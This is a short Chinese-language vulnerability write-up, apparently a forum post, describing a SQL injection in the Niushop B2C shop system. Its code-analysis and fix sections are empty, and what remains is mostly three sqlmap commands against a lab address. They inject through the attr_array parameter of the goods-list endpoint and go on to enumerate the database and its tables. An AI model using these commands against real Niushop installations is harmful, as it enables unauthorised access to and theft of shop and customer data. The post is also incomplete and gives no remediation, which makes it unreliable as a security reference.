0x01 前言

Niushop B2C商城系统基于ThinkPHP5.0开发,源码全部开放(100%),商用免费,四网合一,满足用户、企业、开发者、服务商等角色要求

0x02 代码分析

跟踪到/Application/(wap/shop)/Controller/Goods.php中的ajaxGoodsList方法




0x04 漏洞复现

sqlmap -u "http://172.16.209.129:8085/index.php/wap/goods/getGoodsListByConditions?category_id=1&brand_id=2&min_price=3&max_price=4&page=5&page_size=6&order=7&attr_array[][2]=8*&spec_array[]=9" --random-agent --batch --dbms "mysql"

sqlmap -u "http://172.16.209.129:8085/index.php/wap/goods/getGoodsListByConditions?category_id=1&brand_id=2&min_price=3&max_price=4&page=5&page_size=6&order=7&attr_array[][2]=8*&spec_array[]=9" --random-agent --batch --dbms "mysql" --current-db

sqlmap -u "http://172.16.209.129:8085/index.php/wap/goods/getGoodsListByConditions?category_id=1&brand_id=2&min_price=3&max_price=4&page=5&page_size=6&order=7&attr_array[][2]=8*&spec_array[]=9" --random-agent --batch --dbms "mysql" -D niushop_b2c --tables

0x05 漏洞修复


点击收藏 | 0 关注 | 1
  • 动动手指,沙发就是你的了!
登录 后跟帖